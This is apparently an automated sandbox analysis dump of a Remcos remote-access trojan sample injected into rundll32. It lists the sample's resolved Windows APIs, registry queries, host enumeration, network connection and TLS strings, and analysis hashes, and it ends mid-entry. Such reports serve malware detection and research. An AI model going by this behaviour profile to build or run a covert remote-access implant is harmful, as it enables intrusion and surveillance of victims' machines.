2b13814 14 API calls 48246->48257 48259 2b12850 TerminateProcess WaitForSingleObject 48247->48259 48249 2b0f8c8 ExitProcess 48260 2b127ee 61 API calls 48255->48260 48257->48246 48258->48238 48259->48249 48261 2b347c9 48262 2b347d1 pre_c_initialization 48261->48262 48279 2b442c2 48262->48279 48264 2b347dc pre_c_initialization 48284 2b345cf 48264->48284 48266 2b34865 48295 2b349f9 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 48266->48295 48267 2b347f1 __RTC_Initialize 48267->48266 48289 2b34770 48267->48289 48269 2b3486c ___scrt_initialize_default_local_stdio_options 48271 2b3480a pre_c_initialization 48271->48266 48272 2b3481b 48271->48272 48292 2b34f0d InitializeSListHead 
48272->48292 48274 2b34820 pre_c_initialization 48293 2b34f19 24 API calls 2 library calls 48274->48293 48276 2b34843 pre_c_initialization 48294 2b44832 35 API calls 2 library calls 48276->48294 48278 2b3484e pre_c_initialization 48280 2b442f4 48279->48280 48281 2b442d1 48279->48281 48280->48264 48281->48280 48296 2b405dd 20 API calls _Atexit 48281->48296 48283 2b442e4 _Atexit 48283->48264 48285 2b345dd 48284->48285 48288 2b345e2 ___scrt_initialize_onexit_tables 48284->48288 48285->48288 48297 2b349f9 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 48285->48297 48287 2b34665 48288->48267 48298 2b34735 48289->48298 48292->48274 48293->48276 48294->48278 48295->48269 48296->48283 48297->48287 48299 2b34752 48298->48299 48300 2b34759 48298->48300 48304 2b43f3a 23 API calls __onexit 48299->48304 48305 2b43faa 23 API calls __onexit 48300->48305 48303 2b34757 48303->48271 48304->48303 48305->48303 48306 2b3be58 48308 2b3be64 _swprintf CallCatchBlock 48306->48308 48307 2b3be72 48322 2b405dd 20 API calls _Atexit 48307->48322 48308->48307 48310 2b3be9c 48308->48310 48317 2b45888 EnterCriticalSection 48310->48317 48312 2b3be77 _Atexit CallCatchBlock 48313 2b3bea7 48318 2b3bf48 48313->48318 48317->48313 48320 2b3bf56 48318->48320 48319 2b3beb2 48323 2b3becf LeaveCriticalSection std::_Lockit::~_Lockit 48319->48323 48320->48319 48324 2b4976c 36 API calls 2 library calls 48320->48324 48322->48312 48323->48312 48324->48320 48325 2b0165e 48326 2b01666 48325->48326 48328 2b01669 48325->48328 48327 2b016a8 48329 2b344ea new 22 API calls 48327->48329 48328->48327 48330 2b01696 48328->48330 48331 2b0169c 48329->48331 48332 2b344ea new 22 API calls 48330->48332 48332->48331

                                      Control-flow Graph

                                      APIs
                                      • LoadLibraryA.KERNEL32(Psapi,GetProcessImageFileNameW,?,?,?,?,02B0E9E1), ref: 02B1CB65
                                      • GetProcAddress.KERNEL32(00000000), ref: 02B1CB6E
                                      • GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,02B0E9E1), ref: 02B1CB85
                                      • GetProcAddress.KERNEL32(00000000), ref: 02B1CB88
                                      • LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,02B0E9E1), ref: 02B1CB9A
                                      • GetProcAddress.KERNEL32(00000000), ref: 02B1CB9D
                                      • LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,02B0E9E1), ref: 02B1CBAE
                                      • GetProcAddress.KERNEL32(00000000), ref: 02B1CBB1
                                      • LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,02B0E9E1), ref: 02B1CBC3
                                      • GetProcAddress.KERNEL32(00000000), ref: 02B1CBC6
                                      • LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,02B0E9E1), ref: 02B1CBD2
                                      • GetProcAddress.KERNEL32(00000000), ref: 02B1CBD5
                                      • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,02B0E9E1), ref: 02B1CBE6
                                      • GetProcAddress.KERNEL32(00000000), ref: 02B1CBE9
                                      • GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,02B0E9E1), ref: 02B1CBFA
                                      • GetProcAddress.KERNEL32(00000000), ref: 02B1CBFD
                                      • LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,02B0E9E1), ref: 02B1CC0E
                                      • GetProcAddress.KERNEL32(00000000), ref: 02B1CC11
                                      • GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,02B0E9E1), ref: 02B1CC22
                                      • GetProcAddress.KERNEL32(00000000), ref: 02B1CC25
                                      • GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,02B0E9E1), ref: 02B1CC36
                                      • GetProcAddress.KERNEL32(00000000), ref: 02B1CC39
                                      • GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,02B0E9E1), ref: 02B1CC4A
                                      • GetProcAddress.KERNEL32(00000000), ref: 02B1CC4D
                                      • GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,02B0E9E1), ref: 02B1CC5E
                                      • GetProcAddress.KERNEL32(00000000), ref: 02B1CC61
                                      • GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,02B0E9E1), ref: 02B1CC72
                                      • GetProcAddress.KERNEL32(00000000), ref: 02B1CC75
                                      • LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,02B0E9E1), ref: 02B1CC83
                                      • GetProcAddress.KERNEL32(00000000), ref: 02B1CC86
                                      • LoadLibraryA.KERNEL32(kernel32,GetConsoleWindow,?,?,?,?,02B0E9E1), ref: 02B1CC97
                                      • GetProcAddress.KERNEL32(00000000), ref: 02B1CC9A
                                      • GetModuleHandleA.KERNEL32(ntdll,NtSuspendProcess,?,?,?,?,02B0E9E1), ref: 02B1CCA7
                                      • GetProcAddress.KERNEL32(00000000), ref: 02B1CCAA
                                      • GetModuleHandleA.KERNEL32(ntdll,NtResumeProcess,?,?,?,?,02B0E9E1), ref: 02B1CCB7
                                      • GetProcAddress.KERNEL32(00000000), ref: 02B1CCBA
                                      • LoadLibraryA.KERNEL32(Iphlpapi,GetExtendedTcpTable,?,?,?,?,02B0E9E1), ref: 02B1CCCC
                                      • GetProcAddress.KERNEL32(00000000), ref: 02B1CCCF
                                      • LoadLibraryA.KERNEL32(Iphlpapi,GetExtendedUdpTable,?,?,?,?,02B0E9E1), ref: 02B1CCDC
                                      • GetProcAddress.KERNEL32(00000000), ref: 02B1CCDF
                                      • GetModuleHandleA.KERNEL32(ntdll,NtQueryInformationProcess,?,?,?,?,02B0E9E1), ref: 02B1CCF0
                                      • GetProcAddress.KERNEL32(00000000), ref: 02B1CCF3
                                      • GetModuleHandleA.KERNEL32(kernel32,GetFinalPathNameByHandleW,?,?,?,?,02B0E9E1), ref: 02B1CD04
                                      • GetProcAddress.KERNEL32(00000000), ref: 02B1CD07
                                      • LoadLibraryA.KERNEL32(Rstrtmgr,RmStartSession,?,?,?,?,02B0E9E1), ref: 02B1CD19
                                      • GetProcAddress.KERNEL32(00000000), ref: 02B1CD1C
                                      • LoadLibraryA.KERNEL32(Rstrtmgr,RmRegisterResources,?,?,?,?,02B0E9E1), ref: 02B1CD29
                                      • GetProcAddress.KERNEL32(00000000), ref: 02B1CD2C
                                      • LoadLibraryA.KERNEL32(Rstrtmgr,RmGetList,?,?,?,?,02B0E9E1), ref: 02B1CD39
                                      • GetProcAddress.KERNEL32(00000000), ref: 02B1CD3C
                                      • LoadLibraryA.KERNEL32(Rstrtmgr,RmEndSession,?,?,?,?,02B0E9E1), ref: 02B1CD49
                                      • GetProcAddress.KERNEL32(00000000), ref: 02B1CD4C
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AddressProc$LibraryLoad$HandleModule
                                      • String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetConsoleWindow$GetExtendedTcpTable$GetExtendedUdpTable$GetFinalPathNameByHandleW$GetMonitorInfoW$GetProcessImageFileNameW$GetSystemTimes$GlobalMemoryStatusEx$Iphlpapi$IsUserAnAdmin$IsWow64Process$Kernel32$NtQueryInformationProcess$NtResumeProcess$NtSuspendProcess$NtUnmapViewOfSection$Psapi$RmEndSession$RmGetList$RmRegisterResources$RmStartSession$Rstrtmgr$SetProcessDEPPolicy$SetProcessDpiAwareness$Shell32$Shlwapi$kernel32$ntdll$shcore$user32
                                      • API String ID: 4236061018-3687161714
                                      • Opcode ID: b43e3b4cba1efcf83dd40b4954e1745a455a4f8d8b49eb28495e00f1237151ce
                                      • Instruction ID: e626c9a5a34770c4d165a3bf73bee143d084880fdb60242644cf34102ae83b3f
                                      • Opcode Fuzzy Hash: b43e3b4cba1efcf83dd40b4954e1745a455a4f8d8b49eb28495e00f1237151ce
                                      • Instruction Fuzzy Hash: 7C41FAA4EC03587AFA107BB66C4DE2B3F7DDB456D53014C97B195A3230DABC98148EA4

                                      Control-flow Graph

                                      APIs
                                        • Part of subcall function 02B13549: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 02B13569
                                        • Part of subcall function 02B13549: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,?,02B752F0), ref: 02B13587
                                        • Part of subcall function 02B13549: RegCloseKey.KERNEL32(?), ref: 02B13592
                                      • Sleep.KERNEL32(00000BB8), ref: 02B0F85B
                                      • ExitProcess.KERNEL32 ref: 02B0F8CA
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseExitOpenProcessQuerySleepValue
                                      • String ID: 4.9.4 Pro$override$pth_unenc
                                      • API String ID: 2281282204-930821335
                                      • Opcode ID: 289be5c9b4f5b8ec454be7c142b670502861dd30d3506dc80703788358806133
                                      • Instruction ID: dc38a23eb0337d1ef920d89bdc2be65088f8cb5caf88fb30d300b848574dc2db
                                      • Opcode Fuzzy Hash: 289be5c9b4f5b8ec454be7c142b670502861dd30d3506dc80703788358806133
                                      • Instruction Fuzzy Hash: E321F461F1030097E61A767D489AA7E7EAB9B81B10F9000D8F40A5B6C5FE65D9058FE3

                                      Control-flow Graph

                                      APIs
                                      • GetLocalTime.KERNEL32(?), ref: 02B04F81
                                      • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 02B04FCD
                                      • CreateThread.KERNEL32(00000000,00000000,Function_00005150,?,00000000,00000000), ref: 02B04FE0
                                      Strings
                                      • KeepAlive | Enabled | Timeout: , xrefs: 02B04F94
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Create$EventLocalThreadTime
                                      • String ID: KeepAlive | Enabled | Timeout:
                                      • API String ID: 2532271599-1507639952
                                      • Opcode ID: 807f064ea172dbf66e624c86c33f20c42d71ade6a7ae57c28619c918d43993e8
                                      • Instruction ID: 779018fa04a5d92c5514fe1717d46daa91f007ea1cded72526d180e9283d8abd
                                      • Opcode Fuzzy Hash: 807f064ea172dbf66e624c86c33f20c42d71ade6a7ae57c28619c918d43993e8
                                      • Instruction Fuzzy Hash: A2110631800384ABD732A776884DFAB7FBCDBC6750F04049EE98647580DA745045CBB2
                                      APIs
                                      • WaitForSingleObject.KERNEL32(?,000000FF,?,02B74EF8,02B04C49,00000000,?,?,?,02B74EF8,?), ref: 02B04BA5
                                      • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,02B0548B), ref: 02B04BC3
                                      • recv.WS2_32(?,?,?,00000000), ref: 02B04BDA
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: EventObjectSingleWaitrecv
                                      • String ID:
                                      • API String ID: 311754179-0
                                      • Opcode ID: 99f957d98df5fcc156b8ea7abceee64a44bc8e139634c1f34e14dba91458dc5e
                                      • Instruction ID: c3d0128bdfdf1ae56140f1ac9ed6bb27ab8c1ecbeb7cbaf18178c67c530df02f
                                      • Opcode Fuzzy Hash: 99f957d98df5fcc156b8ea7abceee64a44bc8e139634c1f34e14dba91458dc5e
                                      • Instruction Fuzzy Hash: 46F0823A108622FFD7169B14EC49F4AFB62FB84760F108619F555522A08772AC20CBA1
                                      APIs
                                      • GetComputerNameExW.KERNEL32(00000001,?,0000002B,02B750E4), ref: 02B1B62A
                                      • GetUserNameW.ADVAPI32(?,02B0F223), ref: 02B1B642
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Name$ComputerUser
                                      • String ID:
                                      • API String ID: 4229901323-0
                                      • Opcode ID: 50176b7a8db07631e2c05e51f8eb2bebf7f21dc9aec60e23d86d224d8b737ade
                                      • Instruction ID: cccbe479f4ca571eecb29ae50c05337de3d115f58aea2924b7f937575ecb6f53
                                      • Opcode Fuzzy Hash: 50176b7a8db07631e2c05e51f8eb2bebf7f21dc9aec60e23d86d224d8b737ade
                                      • Instruction Fuzzy Hash: 0901FF7290011CABDB06EBD4DC88EDDBBBDEF44315F1001A6A505A71A0EEB46E89CB94
                                      APIs
                                      • GetLocaleInfoA.KERNEL32(00000800,0000005A,00000000,00000003,?,?,?,02B154FC,02B74EE0,02B75A00,02B74EE0,00000000,02B74EE0,00000000,02B74EE0,4.9.4 Pro), ref: 02B0F8E5
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: InfoLocale
                                      • String ID:
                                      • API String ID: 2299586839-0
                                      • Opcode ID: 41723189f78d94339c5e69ce65a2087f45c92072f4d70eb8f5b2d5ed7289f86a
                                      • Instruction ID: 0cbf4291eaf032abcbaafe51dfab14d8f067b1f8fb01832662b23707b9c7075a
                                      • Opcode Fuzzy Hash: 41723189f78d94339c5e69ce65a2087f45c92072f4d70eb8f5b2d5ed7289f86a
                                      • Instruction Fuzzy Hash: ECD05B30B4421C77D61096959C0AFAA7B9CD701751F0005D6BE05D72C0E9E15E048BD1

                                      Control-flow Graph

                                      APIs
                                        • Part of subcall function 02B1CB50: LoadLibraryA.KERNEL32(Psapi,GetProcessImageFileNameW,?,?,?,?,02B0E9E1), ref: 02B1CB65
                                        • Part of subcall function 02B1CB50: GetProcAddress.KERNEL32(00000000), ref: 02B1CB6E
                                        • Part of subcall function 02B1CB50: GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,02B0E9E1), ref: 02B1CB85
                                        • Part of subcall function 02B1CB50: GetProcAddress.KERNEL32(00000000), ref: 02B1CB88
                                        • Part of subcall function 02B1CB50: LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,02B0E9E1), ref: 02B1CB9A
                                        • Part of subcall function 02B1CB50: GetProcAddress.KERNEL32(00000000), ref: 02B1CB9D
                                        • Part of subcall function 02B1CB50: LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,02B0E9E1), ref: 02B1CBAE
                                        • Part of subcall function 02B1CB50: GetProcAddress.KERNEL32(00000000), ref: 02B1CBB1
                                        • Part of subcall function 02B1CB50: LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,02B0E9E1), ref: 02B1CBC3
                                        • Part of subcall function 02B1CB50: GetProcAddress.KERNEL32(00000000), ref: 02B1CBC6
                                        • Part of subcall function 02B1CB50: LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,02B0E9E1), ref: 02B1CBD2
                                        • Part of subcall function 02B1CB50: GetProcAddress.KERNEL32(00000000), ref: 02B1CBD5
                                        • Part of subcall function 02B1CB50: GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,02B0E9E1), ref: 02B1CBE6
                                        • Part of subcall function 02B1CB50: GetProcAddress.KERNEL32(00000000), ref: 02B1CBE9
                                        • Part of subcall function 02B1CB50: GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,02B0E9E1), ref: 02B1CBFA
                                        • Part of subcall function 02B1CB50: GetProcAddress.KERNEL32(00000000), ref: 02B1CBFD
                                        • Part of subcall function 02B1CB50: LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,02B0E9E1), ref: 02B1CC0E
                                        • Part of subcall function 02B1CB50: GetProcAddress.KERNEL32(00000000), ref: 02B1CC11
                                        • Part of subcall function 02B1CB50: GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,02B0E9E1), ref: 02B1CC22
                                        • Part of subcall function 02B1CB50: GetProcAddress.KERNEL32(00000000), ref: 02B1CC25
                                        • Part of subcall function 02B1CB50: GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,02B0E9E1), ref: 02B1CC36
                                        • Part of subcall function 02B1CB50: GetProcAddress.KERNEL32(00000000), ref: 02B1CC39
                                        • Part of subcall function 02B1CB50: GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,02B0E9E1), ref: 02B1CC4A
                                        • Part of subcall function 02B1CB50: GetProcAddress.KERNEL32(00000000), ref: 02B1CC4D
                                        • Part of subcall function 02B1CB50: GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,02B0E9E1), ref: 02B1CC5E
                                        • Part of subcall function 02B1CB50: GetProcAddress.KERNEL32(00000000), ref: 02B1CC61
                                        • Part of subcall function 02B1CB50: GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,02B0E9E1), ref: 02B1CC72
                                        • Part of subcall function 02B1CB50: GetProcAddress.KERNEL32(00000000), ref: 02B1CC75
                                        • Part of subcall function 02B1CB50: LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,02B0E9E1), ref: 02B1CC83
                                      • GetModuleFileNameW.KERNEL32(00000000,C:\Windows\SysWOW64\rundll32.exe,00000104), ref: 02B0E9EE
                                        • Part of subcall function 02B10F37: __EH_prolog.LIBCMT ref: 02B10F3C
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AddressProc$Module$Handle$LibraryLoad$FileH_prologName
                                      • String ID: Access Level: $Administrator$C:\Windows\SysWOW64\rundll32.exe$Exe$Inj$Remcos Agent initialized$Software\$User$del$del$exepath$licence$license_code.txt
                                      • API String ID: 2830904901-485870807
                                      • Opcode ID: cbc21988a16f2a90c83429a1e458b5e0c3bb7890280cbe0cb4b0a060ba579c6b
                                      • Instruction ID: 7e42dd5af147c6c5aef102e0351db791fd58873faa395ff13e167e980f3431d6
                                      • Opcode Fuzzy Hash: cbc21988a16f2a90c83429a1e458b5e0c3bb7890280cbe0cb4b0a060ba579c6b
                                      • Instruction Fuzzy Hash: FE321C61B543402FEA2FB7789CE5B3E2E9B8F81780F8408DDF5465B2D0EE988D458B51

                                      Control-flow Graph

                                      APIs
                                      • Sleep.KERNEL32(00000000,00000029,02B752F0,02B750E4,00000000), ref: 02B14F7B
                                      • WSAGetLastError.WS2_32(00000000,00000001), ref: 02B1518C
                                      • Sleep.KERNEL32(00000000,00000002), ref: 02B15AD7
                                        • Part of subcall function 02B1B4EF: GetLocalTime.KERNEL32(00000000), ref: 02B1B509
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Sleep$ErrorLastLocalTime
                                      • String ID: | $%I64u$4.9.4 Pro$C:\Windows\SysWOW64\rundll32.exe$Connected | $Connecting | $Connection Error: $Connection Error: Unable to create socket$Disconnected$TLS Off$TLS On $hlight$name
                                      • API String ID: 524882891-3655911104
                                      • Opcode ID: efb75d531ea32555b48b4a0704867105a82e0986498e5ab5bf1d4d055261f263
                                      • Instruction ID: 998dcaa2c2815a35fece84284c9f0c87fbd708cbea5b29e445dd512e859f8401
                                      • Opcode Fuzzy Hash: efb75d531ea32555b48b4a0704867105a82e0986498e5ab5bf1d4d055261f263
                                      • Instruction Fuzzy Hash: B6525931A101149ADB2AF735DCD5AFEBB779F50340FA045E9E80AA71E4EF301E898E54

                                      Control-flow Graph

                                      APIs
                                      • connect.WS2_32(?,?,?), ref: 02B048E0
                                      • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 02B04A00
                                      • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 02B04A0E
                                      • WSAGetLastError.WS2_32 ref: 02B04A21
                                        • Part of subcall function 02B1B4EF: GetLocalTime.KERNEL32(00000000), ref: 02B1B509
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CreateEvent$ErrorLastLocalTimeconnect
                                      • String ID: Connection Failed: $Connection Refused$TLS Authentication Failed$TLS Error 1$TLS Error 2$TLS Error 3$TLS Handshake... |
                                      • API String ID: 994465650-2151626615
                                      • Opcode ID: aeda717f37339d63dc51357f18a800f3eb8e07d1144749d66a90c36227380243
                                      • Instruction ID: 8c70f2335eb8a3c8a1a37815d4b6bd2c9eeb3d249795789466886c561dd48aaa
                                      • Opcode Fuzzy Hash: aeda717f37339d63dc51357f18a800f3eb8e07d1144749d66a90c36227380243
                                      • Instruction Fuzzy Hash: D5411765B403016FA6257B7A889F83D7F27EB51340B8441E8E90207AD5EF11A928CFE3

                                      Control-flow Graph

                                      APIs
                                      • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,02B051C0,?,?,?,02B05159), ref: 02B04E38
                                      • SetEvent.KERNEL32(?,?,?,?,00000000,?,02B051C0,?,?,?,02B05159), ref: 02B04E43
                                      • CloseHandle.KERNEL32(?,?,?,?,00000000,?,02B051C0,?,?,?,02B05159), ref: 02B04E4C
                                      • closesocket.WS2_32(000000FF), ref: 02B04E5A
                                      • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,02B051C0,?,?,?,02B05159), ref: 02B04E91
                                      • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 02B04EA2
                                      • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 02B04EA9
                                      • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 02B04EBA
                                      • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 02B04EBF
                                      • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 02B04EC4
                                      • SetEvent.KERNEL32(?,?,?,?,00000000,?,02B051C0,?,?,?,02B05159), ref: 02B04ED1
                                      • CloseHandle.KERNEL32(?,?,?,?,00000000,?,02B051C0,?,?,?,02B05159), ref: 02B04ED6
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseEventHandle$ObjectSingleWait$closesocket
                                      • String ID:
                                      • API String ID: 3658366068-0
                                      • Opcode ID: dee333805a4cb1c487455911ea7a1c86214dbe34871d01c1675db97580e01240
                                      • Instruction ID: 4a63e44ca14d300e6f7eb978c52100ab9a11dc2aa1abc4f057749172dedb3b53
                                      • Opcode Fuzzy Hash: dee333805a4cb1c487455911ea7a1c86214dbe34871d01c1675db97580e01240
                                      • Instruction Fuzzy Hash: 45211A31440B149FDB366B25DC49B27BBA2FF40366F104E59E2E606AF0CB62B861DB54

                                      Control-flow Graph

                                      APIs
                                      • GetLongPathNameW.KERNEL32(00000000,?,00000208), ref: 02B0DB9A
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: LongNamePath
                                      • String ID: AppData$ProgramData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
                                      • API String ID: 82841172-425784914
                                      • Opcode ID: 1f10bec832a2db538cf5f0e82cd5b04e35c20a808837caa9ef73f48cc0a666a3
                                      • Instruction ID: 4d2bd62e531390ca1b1d841f72811849589c0a1b4c81befc4a1599bbbd47122d
                                      • Opcode Fuzzy Hash: 1f10bec832a2db538cf5f0e82cd5b04e35c20a808837caa9ef73f48cc0a666a3
                                      • Instruction Fuzzy Hash: 034140311182019BE21BFB64DCD48BEBFEAEF91754F0045EEB546920E1FF609A49CE52

                                      Control-flow Graph

                                      APIs
                                        • Part of subcall function 02B1BFB7: GetCurrentProcess.KERNEL32(?,?,?,02B0DAAA,WinDir,00000000,00000000), ref: 02B1BFC8
                                        • Part of subcall function 02B135A6: RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 02B135CA
                                        • Part of subcall function 02B135A6: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,00000400), ref: 02B135E7
                                        • Part of subcall function 02B135A6: RegCloseKey.KERNEL32(?), ref: 02B135F2
                                      • StrToIntA.SHLWAPI(00000000,02B6C9F8,00000000,00000000,00000000,02B750E4,00000003,Exe,00000000,0000000E,00000000,02B660BC,00000003,00000000), ref: 02B1B33C
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseCurrentOpenProcessQueryValue
                                      • String ID: (32 bit)$ (64 bit)$CurrentBuildNumber$ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                      • API String ID: 1866151309-2070987746
                                      • Opcode ID: de9d76c8c69725bcc1877337b9608a545a4834bcad9e2212fb849a68021382c6
                                      • Instruction ID: a9814bf3e281807d70789b2dd8ae1fa5d6c11054abb33f1410505ca0dc4f4308
                                      • Opcode Fuzzy Hash: de9d76c8c69725bcc1877337b9608a545a4834bcad9e2212fb849a68021382c6
                                      • Instruction Fuzzy Hash: EC11C820A4020026E309B378DC8EF7F7F6F8B90300FC401E6E91BA30D1EB5848568BA1

                                      Control-flow Graph

                                      APIs
                                      • GetModuleFileNameA.KERNEL32(00000000,C:\Windows\SysWOW64\rundll32.exe,00000104), ref: 02B43475
                                      • _free.LIBCMT ref: 02B43540
                                      • _free.LIBCMT ref: 02B4354A
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: _free$FileModuleName
                                      • String ID: C:\Windows\SysWOW64\rundll32.exe
                                      • API String ID: 2506810119-2837366778
                                      • Opcode ID: 07ca20d8c52951ea72252b4d38f189ad115c999fcb481ab79db3b010647f5374
                                      • Instruction ID: 45c03013b2575244b06867afc339699f660fc6f8d516e0c1d6c18e9fae7dc465
                                      • Opcode Fuzzy Hash: 07ca20d8c52951ea72252b4d38f189ad115c999fcb481ab79db3b010647f5374
                                      • Instruction Fuzzy Hash: 7B316471A00258AFDB22DF9998C4D9EBBFDEF85314F2840D6E90497201DB709A45DB90

                                      Control-flow Graph

                                      APIs
                                      • RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 02B1377E
